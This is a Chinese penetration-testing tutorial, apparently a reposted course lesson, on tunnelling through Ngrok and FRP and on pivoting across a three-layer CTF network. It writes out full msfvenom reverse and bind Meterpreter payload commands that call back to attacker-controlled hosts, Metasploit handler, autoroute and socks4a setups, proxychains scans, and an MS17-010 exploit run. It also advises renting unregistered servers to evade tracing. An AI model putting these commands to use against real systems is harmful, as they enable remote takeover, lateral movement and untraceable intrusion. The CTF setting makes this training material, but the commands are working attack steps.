70 内网安全-域横向内网漫游Socks代理隧道技术

news2024/11/25 21:36:00

目录

    • 必要基础知识点:
      • 1.内外网简单知识
      • 2.内网1和内网2通信问题
      • 3.正向反向协议通信连接问题
      • 4.内网穿透代理隧道技术说明
    • 演示案例:
      • 内网穿透Ngrok测试演示-两个内网通讯上线
      • 内网穿透Frp自建跳板测试-两个内网通讯上线
      • CFS三层内网漫游安全测试演练-某CTF线下2019
    • 涉及资源:

在这里插入图片描述
主要说的是socks代理技术,属于内网的穿透技术,代理主要是解决内网通信的问题,代理也能解决防火墙的拦截,但隧道主要是安全设备、流量监控等设备上的拦截问题,因为当我们去做渗透测试的时候,需要回传数据,或者回传敏感的东西,你走的协议不一样的话,在这个TCP/IP有七层协议,像TCMP、SSH、HTTP的协议,有些协议它会受到防火墙、过滤设备的流量检测工具、检测设备平台的干扰,所以在内网经常会出现流量传输数据会回显数据、拖数据的时候会出现拦截和一些报警,隧道技术主要是解决这类问题的

对方在内网,我也在内网,这个时候两个内网要能实现通讯的话,就必须要借助代理才能实现
eathworm已经停止更新
在这里插入图片描述

必要基础知识点:

1.内外网简单知识

2.内网1和内网2通信问题

1这个主机在内网1里面,2主机在内网2里面,比如我在我的学校宿舍里面上网,你在网吧上网,那我们两个就都属于内网,但是我们不是一个内网里面,就是你是你学校内网,我是网吧的内网,这两个网络如果要实现通讯的话,比如说我现在有个后门CS,我生成一个后门,然后发给你,这个时候你能让对方上线到这里来,这个是上不了线的,因为你们都是内网,除非这个时候采用代理技术
两个内网再实现通讯,能够实现控制或者数据回连的时候,那基本上是不可能的,就是说你想用CS控制内网主机,你CS也在内网,它的受害主机在另一个内网,不在同一个内网,那么上线是不可能的,因为无法控制它,只会有数据的传递,因为你们都连接互联网,你们可以通过互联网去连接数据,但是这个数据它无法准确的找到你

3.正向反向协议通信连接问题

控制端去连接被控端,这种情况就是正向
被控端去连接控制端,这种就是反向
你的控制端如果是服务器,外网的一台主机,就相当于你在外网有个唯一的IP地址,通过这个IP地址能够找到你,然后对方被控的肉鸡,是一个内网,如果你主动去找被控的内网主机的话,你是找不到的,因为它会有两个IP地址,一个是外网IP,一个是内网IP,你连接外网IP,就相当于你找到一个接口,就好比我们通过路由器上网一样,它就找到路由器那里,那还怎么找到你的主机呢,因为路由器下面还会有很多主机,所以它写这个IP地址,它只会找到路由器那里
连接内网IP地址,因为这个IP地址,内网都可以用到,每个内网里面都会有这个IP地址,就找不到,因为不是唯一的,所以我们主动去连接内网主机连接不上;反过来是反向的话,让被控制端主动过来找你就可以

4.内网穿透代理隧道技术说明

演示案例:

内网穿透Ngrok测试演示-两个内网通讯上线

1.注册-购买-填写-确认http://www.ngrok.cc/
协议: http 本地端口:192.168.76.132:4444
2.测试: 内网1执行后门-免费主机处理-内网2监听-内网2接受器

./sunny clientid aa0676878c162ffc
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit

在这里插入图片描述
理论上不涉及到代理是控制不了的,因为你两者都是内网,你生成后门的时候,你如果写你外网木马地址的话,那么被控制端去连接的时候,找的是你的路由器,你写你内网地址更加找不到,所以它就不可能去实现控制,这个时候就要借助我们的Ngrok工具来实现这个连通
Ngrok会在外网提供一台服务器给你,就相当于这个肉鸡去找你的时候,先找你的服务器,服务器在传输给你,同样的,我们去找被控制端也是要去找这台服务器,这台服务器,我和被控制端都能访问的到
服务器会在控制端这里有个客户端,就相当于接收服务器给的数据,所以你出去这个客户端给服务器,回来也是经过客户端在给到你,所以这个数据的连通就是正常的,ngrok就相当于一个中介
ngrok下载地址:https://www.ngrok.cc/
在这里插入图片描述
在这里插入图片描述
免费的经常会出现掉线,用的时候看你自己需要吧
你用那种协议,等下木马生成就要走什么协议
在这里插入图片描述
在这里插入图片描述
我用MSF生成一个后门,然后再用一台电脑,执行这个后门,让两个内网实现连接
运行客户端,它就会寻找到我们的外网上去
在这里插入图片描述
在这里插入图片描述
确保是online状态就可以了,如果不是这个状态说明你这个隧道有问题,可能是我们的网络有问题,要换收费的
端口要跟我们的木马保持一致
msf配置后门的监听状态,设置payload就很我们生成后门的payload木马保持一致
在这里插入图片描述
我们把后门执行一下,可以看到接收到会话了,接收到的数据一直在变动
在这里插入图片描述
kali是控制端,它在它本地运行ngrok,专门监听ngrok的服务器给到它的实时端口,然后木马配置的就是建立这个监听的木马,所以木马就会找ngrok的服务器,所以ngrok的服务器就监听到了,数据就会给到本地4444,所以我监听4444端口,就会成功监听到木马的回连,其实就是相当于中间多了个服务器,就为他们的传输数据做铺垫,因为他们两个内网,如果单独去找对方,那都找不到,因为都是内网,所以只能借助外网主机,来帮助做这个事情,就是对方要给数据的时候,就到外网,外网就给到下面
在这里插入图片描述
如果大家有什么商用、比较重要的一些,建议还是要使用收费的,免费的,速度各方面,有点小问题,如果你在传输数据,突然断一下很尴尬的,如果不支持断点续传的话,可能又要重新下载了

买的服务器也不是自己的服务器,就是别人帮你提前部署好的,那么对于你在测试的时候,有些隐私或者小秘密怕别人知道,毕竟你用的是别人的服务器,工具本人可以上去偷偷看一下,想要一点秘密的话,可以使用frp,但是使用ngrok可以避免被溯源到,在红蓝对抗中,这也是一个优点

内网穿透Frp自建跳板测试-两个内网通讯上线

自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们
1.服务端-下载-解压-修改-启动 (阿云主机记得修改安全组配置出入口)
服务器修改配置文件frps.ini:
[common]
bind_port = 6677
启动服务端
./frps -c ./frps.ini
2.控制端-下载-解压-修改-启动
控制端修改配置文件frpc.ini:

[common]
server_addr = 你的云主机ip
server_port = 6677           #frpc工作端口,必须和上面frps保持一致
[msf]
type= tcp
local_ip =127.0.0.1
local_port = 5555                 #转发给本机的5555
remote_port = 6000             #服务端用6000端口转发给本机

启动客户端:

./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公网ip lport=6000 -f exe -o frp.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

3.靶机运行frp即可

有条件尽量搞个黑服务器,就是不用实名,不用填一下乱七八糟的的东西,可能价格会高一点,那种服务器不受限制,就不会存在流量各方面受控、端口上面运行一些监控

frp工具相对于ngrok工具会相对更加灵活,你自己搭建的,走的地址由你自己指定,它就能解决两个内网的问题。比如,我在自己家里面,你在学校里面,我想控制你都可以,只需要建立跳板,frp、ngrok类似工具,我直接穿透你,我们以前控制都还需要在外网上面搞个后门工具,偷偷在上面控制,控制端连接外网,在上面操作的话,也在外网操作
这个时候有frp之后,内网的工具也能实现
有时候外网上面工具也不齐全,像你自己电脑很多东西都不是齐全的,这样子传输的时候,也能帮你穿透内网,更方便,你在外网的主机上面去操作的话,很麻烦的
这个技术可以利用到多项操作里面,像扶一下梯子,各种各样都可以

CFS三层内网漫游安全测试演练-某CTF线下2019

来源2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个ELag对应一个积分,获取三个Flag结尾。
Target1:
探针目标-利用WEB漏洞(TP5 RCE)-获取webshell权限-获取FLag-Target2
1.生成后门:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf

2.接受反弹

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.76.132
set LPORT 1111
exploit

3.信息收集及配置访问

获取网络接口: run get_local_subnets
查看路由地址:  run autoroute -p
添加路由地址:  run autoroute -s 192.168.22.0/24
开启本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit

4.利用本地代理接口访问测试
设置浏览器代理进行访问测试
linux:
配置proxychains后调用工具探针Target2

/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80

-Pn: 扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT: 扫描TCP数据包已建立的连接connect
windows:
利用代理工具Proxifier或SocksCap64载入代理进行进程访问测试

Target2:
探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取FLag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入
http://192.168.22.128/index.php?r=admini/public/login #后台
http://192.168.22.128/index.php?r=special #后门shell
1.生成正向后门:

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf

2.访问接受

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit

3.信息收集及配置访问
获取网络接口: run get_local_subnets
查看路由地址: run autoroute -p
添加路由地址: run autoroute -s 192.168.33.0/24

Target3:
探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG

proxychains4 nmap -Pn -sT 192.168.33.33
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
exploit
shell
dir /S flag.txt /B
type xxxxx.txt

在这里插入图片描述
我现在有个76网段,然后我攻击目标1的76.148,因为这个接口我能访问,然后我攻击到它之后
目标3没有网络,所以你正向也不行,反向也不行,正向连接它,你没有它的网段连接不了,它主动过来找你,也不行,因为它没有网络,所以我们只能一步步渗透,渗透到目标1这个服务器了,通过它的网卡22.129去攻击目标2,之后目标2这里是不是有33网卡,这个时候,我们借目标2去攻击目标3

TP5之前报过漏洞,我们直接用EXP去搞它

在这里插入图片描述
因为能执行命令,我们就可以直接写webshell到后门网站的路径下面去,看一下当前路径在那里
在这里插入图片描述
查看下面目录的内容
在这里插入图片描述
写入后门2.php
在这里插入图片描述
利用后门工具去连接
在这里插入图片描述
这个时候,我们要把它当作跳板,我们可以借助CS、MSF进行操作,因为CS上线之后,即使权限不够,也可以执行一些文件来加载代码
CS和MSF的会话是可以交接的,不用去纠结是用cs还是msf
在这里插入图片描述
把.elf文件传上去,执行文件
在这里插入图片描述
在这里插入图片描述
我们前期会进行一个信息收集,收集来的信息,其中就有一个叫网络接口信息
在这里插入图片描述

76网卡就是跟我们这台主机建立连接的,22网卡就是连接内网的另一台主机,但是我现在访问不了22网卡,因为我这个kali是76网卡
添加个路由
在这里插入图片描述
查看路由地址
在这里插入图片描述
我们刚才反弹的会话就是session1,就是说在session1上面多了个路由,表示说我上面有22网卡,添加了一个网络接口,那么我就可以对22网卡进行通讯了,由于是建立到session1的,因为这个session1是通过目标1执行后门后,反弹给我的,所以session1原则上是建立在target1上面,所以我增加路由能成功的原因在这里,添加完之后,说明我跟22这个网卡是能够通讯的
但是这个路由有个问题,只能通过msf进行通讯,这个路由是写到msf上面,有些工具你没有路由规则,那么它对22就无法访问,它只能在msf会话上面进行操作,所以这个时候会在本地开个代理,相当于给其它人一个接口,
我们访问目标2,只受限于会话上面,只在msf上面进行操作,但msf上面要进行攻击,虽然它上面有很多命令能够进行探针,但是他不能攻击,我们肯定是要进行常见攻击,用浏览器打开、用端口扫描,看的着,摸得着的东西去攻击,那样子才能得心应手
这个时候由于我们在上面无法用这些东西进行操作,上面没有这些东西,没有这些功能,所以这个时候,我们就开一个接口,就相当于在目标1或kali上面开个接口,然后让外部人去连接这个接口,因为目前这个kali已经能够访问到目标2了,因为kali上面已经有路由了,所以我可以在上面开个接口,我可以通过本机访问kali2222端口,就相当于我本机就能连到目标2这里
在这里插入图片描述
利用本地代理接口进行端口探针,有时候防火墙会影响到探针的结果
在这里插入图片描述
我们使用浏览器访问目标网址,我们要建立代理,走这个代理,相当于享有这个路由和工具调用端口是一个道理
在这里插入图片描述
在这里插入图片描述
利用sql注入拿到账号密码,对目录进行扫描获取后台登录网址,进行登入,进入后台,获取flag
在这里插入图片描述
这个是后台,后台不可能做代理,就是说我还是需要拿webshell,拿webshell后面才能做代理,做路由,可以通过后台的功能来拿webshell,后台功能里面有模板,模板可以修改代码,直接找到对应文件,写个后门到里面去
在这里插入图片描述
在这里插入图片描述
打开后门连接工具,进行连接,先进行代理设置,让工具走socks4协议,连接kali的2222端口
在这里插入图片描述
在这里插入图片描述
proxifier是全局代理工具,你配置好代理之后,相关的应用程序,就会走这个协议
在这里插入图片描述
有些程序支持上面配置代理,有些不支持,就会有这样的一个差距,不支持你就用sockscap64工具加载
在这里插入图片描述
我们现在是要让目标2主机上线,上线到kali来,生成后门的时候,我们不是要写IP地址,因为在目标2上面没有76网段,使用目标2访问不到76网段,就只能正向连接,我们去连接目标2,我们的控制端是在76网段这里,我们现在取到了目标1的权限,他有22网段,而且我添加了路由,我能找到目标2,目标2没有我的路由,他找不到我,所以我只能正向连接

我生成一个后门绑定3333端口,然后我再用我的kali主动连接目标2,其实就是让我这台主机主动去找目标2
在这里插入图片描述
然后我在把木马上传到webshell上执行

开启监听状态
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
看一下目标2的网络环境
查看当前路由
添加路由
在这里插入图片描述
那会话上面就有这个路由了
在这里插入图片描述
接下来的操作就跟目标1一样了,在开一个端口走协议socks4连接33,对端口3333进行攻击,因为他是windows主机,我们可以使用nmap --script=all进行扫描,也可以使用nessus扫描,在真实渗透测试过程中,我们肯定是要对他进行一些扫描过程
利用扫描到的主机漏洞,进行攻击
在这里插入图片描述

涉及资源:

http://www.ngrok.cc/
https://gofrp.org/docs/
https://github.com/fatedier/frp/releases
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取码: xiao

cs图形化会比msf好看点,但是命令会比msf少一些,功能少一点,所以我们用msf,如果你熟悉cs的话,可以用msf把会话反弹到CS上,就是委派到CS上面去

对方能够连接你就用reverse,不能就用bind
搭建好隧道之后,用CS来监听也可以

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1177947.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Spring Boot + EasyUI Datebox和Datetimebox样例

使用EasyUI的Datebox和Datetimebox组件,并对其进行适当的改造,比如更改日期格式、设置默认值或者将当前时间设置为默认值。 一、运行结果 二、实现代码 1.代码框架 2.实现代码 SpringBootMainApplication.java: package com.xj.main;import org.spri…

Mysql数据库的备份和恢复及日志管理

一、数据备份概述 1.1 备份的分类 完全备份:整个数据库完整地进行备份 增量备份:在完全备份的基础之上,对后续新增的内容进行备份 冷备份:关机备份,停止mysql服务,然后进行备份 热备份:开机备…

【机器视觉--光学】工业相机成像原理

相机成像原理分为透镜成像原理和小孔成像原理,工业相机原理与透镜成像类似。 透镜成像原理 凸透镜的成像规律是 即:物距的倒数与像距的倒数之和等于焦距的倒数 对焦原理 工业相机镜头分为定焦、定倍、变焦镜头,常用的是定焦和定倍&#xff…

Android耗电量测试

背 / 景 / 介 / 绍 目前对于移动设备而言,电量是很重要的一个方面。现在大家使用手机基本每天都需要充电,所以用户也非常关注耗电的问题,如果应用设计不合理导致电量大量消耗,那么对于关注耗电的用户而言,这款应用将会…

EasyExcel实现动态表头功能

EasyExcel实现动态表头功能 开发过程中,大部分都会使用到导出报表功能,目前阶段会用得有 poi导出(暂无), easyexcel导出(官方文档,https://easyexcel.opensource.alibaba.com/docs/current/&am…

六大设计原则:构建优雅、可维护和可扩展的软件

六大设计原则:构建优雅、可维护和可扩展的软件 单一职责原则 (Single Responsibility Principle)开放封闭原则 (Open-Closed Principle)里氏替换原则 (Liskov Substitution Principle)依赖倒置原则 (Dependency Inversion Principle)接口隔离原则 (Interface Segreg…

【Linux】Shell命令行的简易实现(C语言实现)内键命令,普通命令

文章目录 0.准备工作1.大体框架 一、获取命令行二、解析命令行三、进程执行1.普通命令2.内建命令 四、完整代码&#xff1a; 0.准备工作 1.大体框架 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> #include <u…

【MySql】MySql表的增删查改

目录 1.新增 1.1单行数据 全列插入 2.2 多行数据 指定列插入 2.查询 2.1 全列查询 2.2 指定列查询 2.3查询字段为表达式 2.4 别名 2.5 去重&#xff1a;DISTINCT 2.6 排序&#xff1a;ORDER BY 2.7 条件查询&#xff1a;WHERE 2.8 分页查询&#xff1a;LIMIT 3.修…

ARMday01(计算机理论、ARM理论)

计算机理论 计算机组成 输入设备、输出设备、运算器、控制器、存储器 1.输入设备&#xff1a;将编写好的软件代码以及相关的数据输送到计算机中&#xff0c;转换成计算机能够识别、处理和存储的数据形式 键盘、鼠标、手柄、扫描仪、 2.输出设备&#xff1a;将计算机处理好的数…

警告:未配置spring boot 配置注解处理器

前言 这是我在这个网站整理的笔记,有错误的地方请指出&#xff0c;关注我&#xff0c;接下来还会持续更新。 作者&#xff1a;神的孩子都在歌唱 问题 我再使用ConfigurationProperties(prefix “redisson”)去加载配置文件中的属性的时候&#xff0c;发现idea有个警告 并且配…

系统提示缺少或找不到msvcp140.dll文件的解决方法

MSVCP140.dll是Microsoft Visual C 2015 Redistributable的一个组件&#xff0c;它是运行许多Windows应用程序所必需的。当您在计算机上遇到“msvcp140.dll丢失”的错误消息时&#xff0c;这意味着您的系统缺少这个重要的动态链接库文件。以下是详细介绍的5种解决方法&#xff…

Halcon WPF 开发学习笔记(1):Hello World小程序

文章目录 文章专栏视频链接Hello World训练图片训练目的 开始训练图像预处理导入图像三通道处理调用算子通道选取 滤波什么是好的滤波 增加对比度 区域选取阈值处理算子参数选择运行结果(红色为选择区域) 区域分割运行结果 特征筛选参数代码第二次&#xff0c;面积筛选 画选中十…

网络工程师回顾学习

根据书本目录&#xff0c;写下需要记忆的地方&#xff1a; 参考之前的笔记&#xff1a; 网络工程师回答问题_one day321的博客-CSDN博客 重构第一部分需要记忆的&#xff1a; 第一章&#xff1a;计算机网络概论 计算机网络的定义和分类&#xff1a;计算机网络是指将地理位…

快速安装虚拟机centos7.5

vbox 快速导入安装centos7.5 环境准备 vbox安装&#xff08;下载地址&#xff09; ova镜像&#xff08;下载地址&#xff09;&#xff08;默认是192.168.56.10 加nat网卡&#xff09; 链接&#xff1a;https://pan.baidu.com/s/164Iprh_80HCQmKCU6V-RTw 提取码&#xff1a;if…

Oauth授权流程

我们经常会使用第三方的账号来登录某个平台&#xff0c;比如使用QQ账号登录爱奇艺&#xff0c;使用微博登录自如APP。而登录的过程中&#xff0c;会提示自如想访问你的微博公开资料、好友信息&#xff0c;或者爱奇艺要访问您QQ头像、照片等资料。那么这个过程是有一个比较复杂的…

【String类的常用方法】

文章目录 字符串构造String对象的比较字符串查找charAtindexof 转化1. 数值和字符串转化2.大小写转换 toUpperCase toLowerCase3.字符串转数组 toCharArray4.数组转字符串5.格式化 format 字符串替换替换所有的指定内容替换首个内容 字符串拆分以空格拆分特殊字符拆分多个分隔符…

【数据分享】1985-2022年我国地级市专利数据(8项指标/Excel格式/Shp格式)

专利数量是反映一个城市创新水平的重要指标&#xff0c;我们在很多研究中都会用到专利数量数据&#xff0c;之前我们也分享过一些相关数据&#xff0c;比如全国地级市2017-2019年发明专利授权数和全国地级市2017-2020年专利授权数&#xff08;均可查看之前的文章获悉详情&#…

在Linux系统下部署Llama2(MetaAI)大模型教程

Llama2是Meta最新开源的语言大模型&#xff0c;训练数据集2万亿token&#xff0c;上下文长度是由Llama的2048扩展到4096&#xff0c;可以理解和生成更长的文本&#xff0c;包括7B、13B和70B三个模型&#xff0c;在各种基准集的测试上表现突出&#xff0c;最重要的是&#xff0c…

FHEW 和 TFHE 的统一框架:标准化 FHE

参考文献&#xff1a; [GHS12] Gentry C, Halevi S, Smart N P. Better bootstrapping in fully homomorphic encryption[C]//International Workshop on Public Key Cryptography. Berlin, Heidelberg: Springer Berlin Heidelberg, 2012: 1-16.[GHPS12] Gentry C, Halevi S,…

视频编辑SDK测试

短视频编辑SDK测试有一段时间了&#xff0c;因此抽时间对编辑SDK的相关内容进行简要复盘。 功能说明 短视频编辑SDK支持gif&#xff0c;不同格式的图片&#xff0c;视频文件的拼接导入&#xff0c;编辑&#xff0c;添加特效&#xff0c;合成导出等功能。更具体的介绍可以参照…